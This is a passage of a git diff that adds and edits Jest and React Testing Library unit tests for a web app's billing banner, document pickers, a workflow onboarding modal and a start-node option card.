expect(contactSection).toHaveTextContent('custom.customize.suffix') + }) + + it('should not show contact section when enableBilling is false', () => { + // Arrange & Act + renderWithContext({ + enableBilling: false, + plan: { type: Plan.professional }, + }) + + // Assert + expect(screen.queryByText('custom.customize.prefix')).not.toBeInTheDocument() + expect(screen.queryByText('custom.customize.contactUs')).not.toBeInTheDocument() + }) + + it('should not show contact section when plan is sandbox', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.queryByText('custom.customize.prefix')).not.toBeInTheDocument() + expect(screen.queryByText('custom.customize.contactUs')).not.toBeInTheDocument() + }) + + it('should render contact link with correct URL', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + const link = screen.getByText('custom.customize.contactUs').closest('a') + expect(link).toHaveAttribute('href', contactSalesUrl) + expect(link).toHaveAttribute('target', '_blank') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + }) + + it('should have correct positioning for contact section', () => { + // Arrange & Act + const { container } = renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + const contactSection = container.querySelector('.absolute.bottom-0') + expect(contactSection).toBeInTheDocument() + expect(contactSection).toHaveClass('h-[50px]') + expect(contactSection).toHaveClass('text-xs') + expect(contactSection).toHaveClass('leading-[50px]') + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should call setShowPricingModal when upgrade button is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Act + const upgradeButton = screen.getByText('billing.upgradeBtn.encourageShort') + await user.click(upgradeButton) + + // Assert + expect(mockSetShowPricingModal).toHaveBeenCalledTimes(1) + }) + + it('should call setShowPricingModal without arguments', async () => { + // Arrange + const user = userEvent.setup() + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Act + const upgradeButton = screen.getByText('billing.upgradeBtn.encourageShort') + await user.click(upgradeButton) + + // Assert + expect(mockSetShowPricingModal).toHaveBeenCalledWith() + }) + + it('should handle multiple clicks on upgrade button', async () => { + // Arrange + const user = userEvent.setup() + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Act + const upgradeButton = screen.getByText('billing.upgradeBtn.encourageShort') + await user.click(upgradeButton) + await user.click(upgradeButton) + await user.click(upgradeButton) + + // Assert + expect(mockSetShowPricingModal).toHaveBeenCalledTimes(3) + }) + + it('should have correct button styling for upgrade button', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + const upgradeButton = screen.getByText('billing.upgradeBtn.encourageShort') + expect(upgradeButton).toHaveClass('cursor-pointer') + expect(upgradeButton).toHaveClass('bg-white') + expect(upgradeButton).toHaveClass('text-text-accent') + expect(upgradeButton).toHaveClass('rounded-3xl') + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle undefined plan type gracefully', () => { + // Arrange & Act + expect(() => { + renderWithContext({ + enableBilling: true, + plan: { type: undefined }, + }) + }).not.toThrow() + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + }) + + it('should handle plan without type property', () => { + // Arrange & Act + expect(() => { + renderWithContext({ + enableBilling: true, + plan: { type: null }, + }) + }).not.toThrow() + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + }) + + it('should not show any banners when both conditions are false', () => { + // Arrange & Act + renderWithContext({ + enableBilling: false, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.queryByText('custom.customize.prefix')).not.toBeInTheDocument() + }) + + it('should handle enableBilling undefined', () => { + // Arrange & Act + expect(() => { + renderWithContext({ + enableBilling: undefined, + plan: { type: Plan.sandbox }, + }) + }).not.toThrow() + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + }) + + it('should show only billing tip for sandbox plan, not contact section', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.getByText('custom.upgradeTip.title')).toBeInTheDocument() + expect(screen.queryByText('custom.customize.contactUs')).not.toBeInTheDocument() + }) + + it('should show only contact section for professional plan, not billing tip', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.getByText('custom.customize.contactUs')).toBeInTheDocument() + }) + + it('should show only contact section for team plan, not billing tip', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.team }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.getByText('custom.customize.contactUs')).toBeInTheDocument() + }) + + it('should handle empty plan object', () => { + // Arrange & Act + expect(() => { + renderWithContext({ + enableBilling: true, + plan: {}, + }) + }).not.toThrow() + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + }) + }) + + // Accessibility Tests + describe('Accessibility', () => { + it('should have clickable upgrade button', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + const upgradeButton = screen.getByText('billing.upgradeBtn.encourageShort') + expect(upgradeButton).toBeInTheDocument() + expect(upgradeButton).toHaveClass('cursor-pointer') + }) + + it('should have proper external link attributes on contact link', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + const link = screen.getByText('custom.customize.contactUs').closest('a') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + expect(link).toHaveAttribute('target', '_blank') + }) + + it('should have proper text hierarchy in billing tip', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + const title = screen.getByText('custom.upgradeTip.title') + const description = screen.getByText('custom.upgradeTip.des') + + expect(title).toHaveClass('title-xl-semi-bold') + expect(description).toHaveClass('system-sm-regular') + }) + + it('should use semantic color classes', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert - Check that the billing tip has text content (which implies semantic colors) + expect(screen.getByText('custom.upgradeTip.title')).toBeInTheDocument() + }) + }) + + // Integration Tests + describe('Integration', () => { + it('should render both CustomWebAppBrand and billing tip together', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + expect(screen.getByText('custom.upgradeTip.title')).toBeInTheDocument() + }) + + it('should render both CustomWebAppBrand and contact section together', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + expect(screen.getByText('custom.customize.contactUs')).toBeInTheDocument() + }) + + it('should render only CustomWebAppBrand when no billing conditions met', () => { + // Arrange & Act + renderWithContext({ + enableBilling: false, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.queryByText('custom.customize.contactUs')).not.toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/datasets/common/document-picker/index.spec.tsx b/web/app/components/datasets/common/document-picker/index.spec.tsx index 3caa3d655b..0ce4d8afa5 100644 --- a/web/app/components/datasets/common/document-picker/index.spec.tsx +++ b/web/app/components/datasets/common/document-picker/index.spec.tsx @@ -5,13 +5,6 @@ import type { ParentMode, SimpleDocumentDetail } from '@/models/datasets' import { ChunkingMode, DataSourceType } from '@/models/datasets' import DocumentPicker from './index' -// Mock react-i18next -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - // Mock portal-to-follow-elem - always render content for testing jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ PortalToFollowElem: ({ children, open }: { diff --git a/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx b/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx index e6900d23db..737ef8b6dc 100644 --- a/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx +++ b/web/app/components/datasets/common/document-picker/preview-document-picker.spec.tsx @@ -3,7 +3,7 @@ import { fireEvent, render, screen } from '@testing-library/react' import type { DocumentItem } from '@/models/datasets' import PreviewDocumentPicker from './preview-document-picker' -// Mock react-i18next +// Override shared i18n mock for custom translations jest.mock('react-i18next', () => ({ useTranslation: () => ({ t: (key: string, params?: Record) => { diff --git a/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx b/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx index be509f1c6e..7d5edb3dbb 100644 --- a/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx +++ b/web/app/components/datasets/common/retrieval-method-config/index.spec.tsx @@ -9,13 +9,6 @@ import { } from '@/models/datasets' import RetrievalMethodConfig from './index' -// Mock react-i18next -jest.mock('react-i18next', () => ({ - useTranslation: () => ({ - t: (key: string) => key, - }), -})) - // Mock provider context with controllable supportRetrievalMethods let mockSupportRetrievalMethods: RETRIEVE_METHOD[] = [ RETRIEVE_METHOD.semantic, diff --git a/web/app/components/workflow-app/components/workflow-onboarding-modal/index.spec.tsx b/web/app/components/workflow-app/components/workflow-onboarding-modal/index.spec.tsx new file mode 100644 index 0000000000..81d7dc8af6 --- /dev/null +++ b/web/app/components/workflow-app/components/workflow-onboarding-modal/index.spec.tsx @@ -0,0 +1,686 @@ +import React from 'react' +import { fireEvent, render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import WorkflowOnboardingModal from './index' +import { BlockEnum } from '@/app/components/workflow/types' + +// Mock Modal component +jest.mock('@/app/components/base/modal', () => { + return function MockModal({ + isShow, + onClose, + children, + closable, + }: any) { + if (!isShow) + return null + + return ( +
+ {closable && ( + + )} + {children} +
+ ) + } +}) + +// Mock useDocLink hook +jest.mock('@/context/i18n', () => ({ + useDocLink: () => (path: string) => `https://docs.example.com${path}`, +})) + +// Mock StartNodeSelectionPanel (using real component would be better for integration, +// but for this test we'll mock to control behavior) +jest.mock('./start-node-selection-panel', () => { + return function MockStartNodeSelectionPanel({ + onSelectUserInput, + onSelectTrigger, + }: any) { + return ( +
+ + + +
+ ) + } +}) + +describe('WorkflowOnboardingModal', () => { + const mockOnClose = jest.fn() + const mockOnSelectStartNode = jest.fn() + + const defaultProps = { + isShow: true, + onClose: mockOnClose, + onSelectStartNode: mockOnSelectStartNode, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Helper function to render component + const renderComponent = (props = {}) => { + return render() + } + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should render modal when isShow is true', () => { + // Arrange & Act + renderComponent({ isShow: true }) + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + + it('should not render modal when isShow is false', () => { + // Arrange & Act + renderComponent({ isShow: false }) + + // Assert + expect(screen.queryByTestId('modal')).not.toBeInTheDocument() + }) + + it('should render modal title', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('workflow.onboarding.title')).toBeInTheDocument() + }) + + it('should render modal description', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert - Check both parts of description (separated by link) + const descriptionDiv = container.querySelector('.body-xs-regular.leading-4') + expect(descriptionDiv).toBeInTheDocument() + expect(descriptionDiv).toHaveTextContent('workflow.onboarding.description') + expect(descriptionDiv).toHaveTextContent('workflow.onboarding.aboutStartNode') + }) + + it('should render learn more link', () => { + // Arrange & Act + renderComponent() + + // Assert + const learnMoreLink = screen.getByText('workflow.onboarding.learnMore') + expect(learnMoreLink).toBeInTheDocument() + expect(learnMoreLink.closest('a')).toHaveAttribute('href', 'https://docs.example.com/guides/workflow/node/start') + expect(learnMoreLink.closest('a')).toHaveAttribute('target', '_blank') + expect(learnMoreLink.closest('a')).toHaveAttribute('rel', 'noopener noreferrer') + }) + + it('should render StartNodeSelectionPanel', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByTestId('start-node-selection-panel')).toBeInTheDocument() + }) + + it('should render ESC tip when modal is shown', () => { + // Arrange & Act + renderComponent({ isShow: true }) + + // Assert + expect(screen.getByText('workflow.onboarding.escTip.press')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.escTip.key')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.escTip.toDismiss')).toBeInTheDocument() + }) + + it('should not render ESC tip when modal is hidden', () => { + // Arrange & Act + renderComponent({ isShow: false }) + + // Assert + expect(screen.queryByText('workflow.onboarding.escTip.press')).not.toBeInTheDocument() + }) + + it('should have correct styling for title', () => { + // Arrange & Act + renderComponent() + + // Assert + const title = screen.getByText('workflow.onboarding.title') + expect(title).toHaveClass('title-2xl-semi-bold') + expect(title).toHaveClass('text-text-primary') + }) + + it('should have modal close button', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByTestId('modal-close-button')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should accept isShow prop', () => { + // Arrange & Act + const { rerender } = renderComponent({ isShow: false }) + + // Assert + expect(screen.queryByTestId('modal')).not.toBeInTheDocument() + + // Act + rerender() + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + + it('should accept onClose prop', () => { + // Arrange + const customOnClose = jest.fn() + + // Act + renderComponent({ onClose: customOnClose }) + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + + it('should accept onSelectStartNode prop', () => { + // Arrange + const customHandler = jest.fn() + + // Act + renderComponent({ onSelectStartNode: customHandler }) + + // Assert + expect(screen.getByTestId('start-node-selection-panel')).toBeInTheDocument() + }) + + it('should handle undefined onClose gracefully', () => { + // Arrange & Act + expect(() => { + renderComponent({ onClose: undefined }) + }).not.toThrow() + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + + it('should handle undefined onSelectStartNode gracefully', () => { + // Arrange & Act + expect(() => { + renderComponent({ onSelectStartNode: undefined }) + }).not.toThrow() + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + }) + + // User Interactions - Start Node Selection + describe('User Interactions - Start Node Selection', () => { + it('should call onSelectStartNode with Start block when user input is selected', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputButton = screen.getByTestId('select-user-input') + await user.click(userInputButton) + + // Assert + expect(mockOnSelectStartNode).toHaveBeenCalledTimes(1) + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.Start) + }) + + it('should call onClose after selecting user input', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const userInputButton = screen.getByTestId('select-user-input') + await user.click(userInputButton) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should call onSelectStartNode with trigger type when trigger is selected', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const triggerButton = screen.getByTestId('select-trigger-schedule') + await user.click(triggerButton) + + // Assert + expect(mockOnSelectStartNode).toHaveBeenCalledTimes(1) + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.TriggerSchedule, undefined) + }) + + it('should call onClose after selecting trigger', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const triggerButton = screen.getByTestId('select-trigger-schedule') + await user.click(triggerButton) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should pass tool config when selecting trigger with config', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const webhookButton = screen.getByTestId('select-trigger-webhook') + await user.click(webhookButton) + + // Assert + expect(mockOnSelectStartNode).toHaveBeenCalledTimes(1) + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.TriggerWebhook, { config: 'test' }) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + }) + + // User Interactions - Modal Close + describe('User Interactions - Modal Close', () => { + it('should call onClose when close button is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const closeButton = screen.getByTestId('modal-close-button') + await user.click(closeButton) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should not call onSelectStartNode when closing without selection', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const closeButton = screen.getByTestId('modal-close-button') + await user.click(closeButton) + + // Assert + expect(mockOnSelectStartNode).not.toHaveBeenCalled() + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + }) + + // Keyboard Event Handling + describe('Keyboard Event Handling', () => { + it('should call onClose when ESC key is pressed', () => { + // Arrange + renderComponent({ isShow: true }) + + // Act + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should not call onClose when other keys are pressed', () => { + // Arrange + renderComponent({ isShow: true }) + + // Act + fireEvent.keyDown(document, { key: 'Enter', code: 'Enter' }) + fireEvent.keyDown(document, { key: 'Tab', code: 'Tab' }) + fireEvent.keyDown(document, { key: 'a', code: 'KeyA' }) + + // Assert + expect(mockOnClose).not.toHaveBeenCalled() + }) + + it('should not call onClose when ESC is pressed but modal is hidden', () => { + // Arrange + renderComponent({ isShow: false }) + + // Act + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).not.toHaveBeenCalled() + }) + + it('should clean up event listener on unmount', () => { + // Arrange + const { unmount } = renderComponent({ isShow: true }) + + // Act + unmount() + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).not.toHaveBeenCalled() + }) + + it('should update event listener when isShow changes', () => { + // Arrange + const { rerender } = renderComponent({ isShow: true }) + + // Act - Press ESC when shown + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + + // Act - Hide modal and clear mock + mockOnClose.mockClear() + rerender() + + // Act - Press ESC when hidden + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).not.toHaveBeenCalled() + }) + + it('should handle multiple ESC key presses', () => { + // Arrange + renderComponent({ isShow: true }) + + // Act + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(3) + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle rapid modal show/hide toggling', async () => { + // Arrange + const { rerender } = renderComponent({ isShow: false }) + + // Assert + expect(screen.queryByTestId('modal')).not.toBeInTheDocument() + + // Act + rerender() + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + + // Act + rerender() + + // Assert + await waitFor(() => { + expect(screen.queryByTestId('modal')).not.toBeInTheDocument() + }) + }) + + it('should handle selecting multiple nodes in sequence', async () => { + // Arrange + const user = userEvent.setup() + const { rerender } = renderComponent() + + // Act - Select user input + await user.click(screen.getByTestId('select-user-input')) + + // Assert + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.Start) + expect(mockOnClose).toHaveBeenCalledTimes(1) + + // Act - Re-show modal and select trigger + mockOnClose.mockClear() + mockOnSelectStartNode.mockClear() + rerender() + + await user.click(screen.getByTestId('select-trigger-schedule')) + + // Assert + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.TriggerSchedule, undefined) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should handle prop updates correctly', () => { + // Arrange + const { rerender } = renderComponent({ isShow: true }) + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + + // Act - Update props + const newOnClose = jest.fn() + const newOnSelectStartNode = jest.fn() + rerender( + , + ) + + // Assert - Modal still renders with new props + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + + it('should handle onClose being called multiple times', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + await user.click(screen.getByTestId('modal-close-button')) + await user.click(screen.getByTestId('modal-close-button')) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(2) + }) + + it('should maintain modal state when props change', () => { + // Arrange + const { rerender } = renderComponent({ isShow: true }) + + // Assert + expect(screen.getByTestId('modal')).toBeInTheDocument() + + // Act - Change onClose handler + const newOnClose = jest.fn() + rerender() + + // Assert - Modal should still be visible + expect(screen.getByTestId('modal')).toBeInTheDocument() + }) + }) + + // Accessibility Tests + describe('Accessibility', () => { + it('should have dialog role', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByRole('dialog')).toBeInTheDocument() + }) + + it('should have proper heading hierarchy', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const heading = container.querySelector('h3') + expect(heading).toBeInTheDocument() + expect(heading).toHaveTextContent('workflow.onboarding.title') + }) + + it('should have external link with proper attributes', () => { + // Arrange & Act + renderComponent() + + // Assert + const link = screen.getByText('workflow.onboarding.learnMore').closest('a') + expect(link).toHaveAttribute('target', '_blank') + expect(link).toHaveAttribute('rel', 'noopener noreferrer') + }) + + it('should have keyboard navigation support via ESC key', () => { + // Arrange + renderComponent({ isShow: true }) + + // Act + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should have visible ESC key hint', () => { + // Arrange & Act + renderComponent({ isShow: true }) + + // Assert + const escKey = screen.getByText('workflow.onboarding.escTip.key') + expect(escKey.closest('kbd')).toBeInTheDocument() + expect(escKey.closest('kbd')).toHaveClass('system-kbd') + }) + + it('should have descriptive text for ESC functionality', () => { + // Arrange & Act + renderComponent({ isShow: true }) + + // Assert + expect(screen.getByText('workflow.onboarding.escTip.press')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.escTip.toDismiss')).toBeInTheDocument() + }) + + it('should have proper text color classes', () => { + // Arrange & Act + renderComponent() + + // Assert + const title = screen.getByText('workflow.onboarding.title') + expect(title).toHaveClass('text-text-primary') + }) + + it('should have underlined learn more link', () => { + // Arrange & Act + renderComponent() + + // Assert + const link = screen.getByText('workflow.onboarding.learnMore').closest('a') + expect(link).toHaveClass('underline') + expect(link).toHaveClass('cursor-pointer') + }) + }) + + // Integration Tests + describe('Integration', () => { + it('should complete full flow of selecting user input node', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Assert - Initial state + expect(screen.getByTestId('modal')).toBeInTheDocument() + expect(screen.getByText('workflow.onboarding.title')).toBeInTheDocument() + expect(screen.getByTestId('start-node-selection-panel')).toBeInTheDocument() + + // Act - Select user input + await user.click(screen.getByTestId('select-user-input')) + + // Assert - Callbacks called + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.Start) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should complete full flow of selecting trigger node', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Assert - Initial state + expect(screen.getByTestId('modal')).toBeInTheDocument() + + // Act - Select trigger + await user.click(screen.getByTestId('select-trigger-webhook')) + + // Assert - Callbacks called with config + expect(mockOnSelectStartNode).toHaveBeenCalledWith(BlockEnum.TriggerWebhook, { config: 'test' }) + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + + it('should render all components in correct hierarchy', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert - Modal is the root + expect(screen.getByTestId('modal')).toBeInTheDocument() + + // Assert - Header elements + const heading = container.querySelector('h3') + expect(heading).toBeInTheDocument() + + // Assert - Description with link + expect(screen.getByText('workflow.onboarding.learnMore').closest('a')).toBeInTheDocument() + + // Assert - Selection panel + expect(screen.getByTestId('start-node-selection-panel')).toBeInTheDocument() + + // Assert - ESC tip + expect(screen.getByText('workflow.onboarding.escTip.key')).toBeInTheDocument() + }) + + it('should coordinate between keyboard and click interactions', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act - Click close button + await user.click(screen.getByTestId('modal-close-button')) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + + // Act - Clear and try ESC key + mockOnClose.mockClear() + fireEvent.keyDown(document, { key: 'Escape', code: 'Escape' }) + + // Assert + expect(mockOnClose).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-option.spec.tsx b/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-option.spec.tsx new file mode 100644 index 0000000000..d8ef1a3149 --- /dev/null +++ b/web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-option.spec.tsx @@ -0,0 +1,348 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import StartNodeOption from './start-node-option' + +describe('StartNodeOption', () => { + const mockOnClick = jest.fn() + const defaultProps = { + icon:
Icon
, + title: 'Test Title', + description: 'Test description for the option', + onClick: mockOnClick, + } + + beforeEach(() => { + jest.clearAllMocks() + }) + + // Helper function to render component + const renderComponent = (props = {}) => { + return render() + } + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('Test Title')).toBeInTheDocument() + }) + + it('should render icon correctly', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByTestId('test-icon')).toBeInTheDocument() + expect(screen.getByText('Icon')).toBeInTheDocument() + }) + + it('should render title correctly', () => { + // Arrange & Act + renderComponent() + + // Assert + const title = screen.getByText('Test Title') + expect(title).toBeInTheDocument() + expect(title).toHaveClass('system-md-semi-bold') + expect(title).toHaveClass('text-text-primary') + }) + + it('should render description correctly', () => { + // Arrange & Act + renderComponent() + + // Assert + const description = screen.getByText('Test description for the option') + expect(description).toBeInTheDocument() + expect(description).toHaveClass('system-xs-regular') + expect(description).toHaveClass('text-text-tertiary') + }) + + it('should be rendered as a clickable card', () => { + // Arrange & Act + const { container } = renderComponent() + + // Assert + const card = container.querySelector('.cursor-pointer') + expect(card).toBeInTheDocument() + // Check that it has cursor-pointer class to indicate clickability + expect(card).toHaveClass('cursor-pointer') + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should render with subtitle when provided', () => { + // Arrange & Act + renderComponent({ subtitle: 'Optional Subtitle' }) + + // Assert + expect(screen.getByText('Optional Subtitle')).toBeInTheDocument() + }) + + it('should not render subtitle when not provided', () => { + // Arrange & Act + renderComponent() + + // Assert + const titleElement = screen.getByText('Test Title').parentElement + expect(titleElement).not.toHaveTextContent('Optional Subtitle') + }) + + it('should render subtitle with correct styling', () => { + // Arrange & Act + renderComponent({ subtitle: 'Subtitle Text' }) + + // Assert + const subtitle = screen.getByText('Subtitle Text') + expect(subtitle).toHaveClass('system-md-regular') + expect(subtitle).toHaveClass('text-text-quaternary') + }) + + it('should render custom icon component', () => { + // Arrange + const customIcon = Custom + + // Act + renderComponent({ icon: customIcon }) + + // Assert + expect(screen.getByTestId('custom-svg')).toBeInTheDocument() + }) + + it('should render long title correctly', () => { + // Arrange + const longTitle = 'This is a very long title that should still render correctly' + + // Act + renderComponent({ title: longTitle }) + + // Assert + expect(screen.getByText(longTitle)).toBeInTheDocument() + }) + + it('should render long description correctly', () => { + // Arrange + const longDescription = 'This is a very long description that explains the option in great detail and should still render correctly within the component layout' + + // Act + renderComponent({ description: longDescription }) + + // Assert + expect(screen.getByText(longDescription)).toBeInTheDocument() + }) + + it('should render with proper layout structure', () => { + // Arrange & Act + renderComponent() + + // Assert + expect(screen.getByText('Test Title')).toBeInTheDocument() + expect(screen.getByText('Test description for the option')).toBeInTheDocument() + expect(screen.getByTestId('test-icon')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should call onClick when card is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const card = screen.getByText('Test Title').closest('div[class*="cursor-pointer"]') + await user.click(card!) + + // Assert + expect(mockOnClick).toHaveBeenCalledTimes(1) + }) + + it('should call onClick when icon is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const icon = screen.getByTestId('test-icon') + await user.click(icon) + + // Assert + expect(mockOnClick).toHaveBeenCalledTimes(1) + }) + + it('should call onClick when title is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const title = screen.getByText('Test Title') + await user.click(title) + + // Assert + expect(mockOnClick).toHaveBeenCalledTimes(1) + }) + + it('should call onClick when description is clicked', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const description = screen.getByText('Test description for the option') + await user.click(description) + + // Assert + expect(mockOnClick).toHaveBeenCalledTimes(1) + }) + + it('should handle multiple rapid clicks', async () => { + // Arrange + const user = userEvent.setup() + renderComponent() + + // Act + const card = screen.getByText('Test Title').closest('div[class*="cursor-pointer"]') + await user.click(card!) + await user.click(card!) + await user.click(card!) + + // Assert + expect(mockOnClick).toHaveBeenCalledTimes(3) + }) + + it('should not throw error if onClick is undefined', async () => { + // Arrange + const user = userEvent.setup() + renderComponent({ onClick: undefined }) + + // Act & Assert + const card = screen.getByText('Test Title').closest('div[class*="cursor-pointer"]') + await expect(user.click(card!)).resolves.not.toThrow() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty string title', () => { + // Arrange & Act + renderComponent({ title: '' }) + + // Assert + const titleContainer = screen.getByText('Test description for the option').parentElement?.parentElement + expect(titleContainer).toBeInTheDocument() + }) + + it('should handle empty string description', () => { + // Arrange & Act 